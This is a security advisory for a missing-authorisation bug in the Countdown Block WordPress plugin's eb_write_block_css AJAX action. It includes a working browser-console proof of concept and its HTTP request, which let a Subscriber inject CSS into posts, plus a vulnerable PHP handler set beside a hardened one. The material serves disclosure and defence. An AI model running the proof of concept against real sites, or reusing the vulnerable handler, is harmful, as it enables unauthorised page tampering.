Source: wpexploit (author apple502j)
WPEX-ID: 431901EB-0F95-4033-B943-324E6D3844A5
Published: Aug 30, 2021

Countdown Block < 1.1.2 - Missing Authorisation in AJAX action

Tags: missing authorisation, ajax action, unauthorized access, security exploit, cross-site scripting

EPSS: 0.001 (percentile 24.8%)

The plugin does not perform an authorisation check in the eb_write_block_css AJAX action, which allows any authenticated user, such as a Subscriber, to modify the post content displayed to visitors. The attempted fix in v1.1.1 was incomplete: due to a logic flaw, the action could still be exploited through a CSRF attack against an admin. The issue is fixed in v1.1.2.

Log in as any user, such as a Subscriber, open any wp-admin page (so that jQuery and the ajaxurl global are defined) and run the command below in the browser's Web Developer console, replacing POST_ID with the ID of the post to add the content to:

jQuery.post(ajaxurl,{action:"eb_write_block_css",id:POST_ID,data:JSON.stringify([{desktop:"p:before{content:'This content was added by a subscriber!';}"}])})

Which will send the following request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 143
Connection: close
Cookie: [any authenticated user]

action=eb_write_block_css&id=1422&data=%5B%7B%22desktop%22%3A%22p%3Abefore%7Bcontent%3A'This+content+was+added+by+a+subscriber!'%3B%7D%22%7D%5D

Then view the post: the injected CSS rule is rendered with it, so the text 'This content was added by a subscriber!' appears before every paragraph.
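The pattern behind this class of bug, and its hardened form, written against the WordPress AJAX API as an added illustration. This is not the Countdown Block plugin's own code: only the action name eb_write_block_css and the id/data parameters come from the advisory; the handler suffixes, the meta key _eb_block_css, the script handle eb-countdown-editor and the tablet/mobile keys are assumptions made for the example.

```php
<?php
// Illustrative example added to the advisory, not the plugin's own code.
// Handler suffixes, meta key, script handle and tablet/mobile keys are assumptions.

// Vulnerable pattern: the action is reachable by any logged-in user and
// writes attacker-controlled CSS into post meta without checking a nonce
// or the caller's capability on the target post.
add_action( 'wp_ajax_eb_write_block_css_vuln', function () {
    $post_id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0;
    $data    = isset( $_POST['data'] ) ? json_decode( wp_unslash( $_POST['data'] ), true ) : array();
    update_post_meta( $post_id, '_eb_block_css', $data ); // any Subscriber reaches this line
    wp_send_json_success();
} );

// Hardened pattern: require a valid nonce AND verify the caller may edit this
// specific post. Either check alone is insufficient: a nonce without a
// capability check still lets any logged-in user write, and a capability
// check without a nonce still lets a CSRF'd admin act as a confused deputy.
add_action( 'wp_ajax_eb_write_block_css_fixed', function () {
    check_ajax_referer( 'eb_write_block_css', 'nonce' ); // dies with 403 on failure

    $post_id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $raw  = isset( $_POST['data'] ) ? wp_unslash( $_POST['data'] ) : '';
    $data = json_decode( $raw, true );
    if ( ! is_array( $data ) ) {
        wp_send_json_error( 'bad request', 400 );
    }

    // Keep only the expected keys and strip tags so the stored value cannot
    // close a <style> element when it is later echoed into the page.
    $clean = array();
    foreach ( $data as $entry ) {
        $row = array();
        foreach ( array( 'desktop', 'tablet', 'mobile' ) as $key ) { // assumed key set
            if ( isset( $entry[ $key ] ) && is_string( $entry[ $key ] ) ) {
                $row[ $key ] = wp_strip_all_tags( $entry[ $key ] );
            }
        }
        if ( $row ) {
            $clean[] = $row;
        }
    }

    update_post_meta( $post_id, '_eb_block_css', $clean );
    wp_send_json_success();
} );

// The nonce has to be issued to the page that fires the request (here the
// block editor) so the client can send it as the 'nonce' POST field.
add_action( 'enqueue_block_editor_assets', function () {
    wp_localize_script( 'eb-countdown-editor', 'ebCountdown', array( // assumed handle
        'nonce' => wp_create_nonce( 'eb_write_block_css' ),
    ) );
} );
```

With the hardened handler, the PoC request above fails at check_ajax_referer for the Subscriber (no nonce), and a forged request riding an admin's session fails the same way; a logged-in Subscriber who somehow obtained a nonce still fails the edit_post check on a post they do not own.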

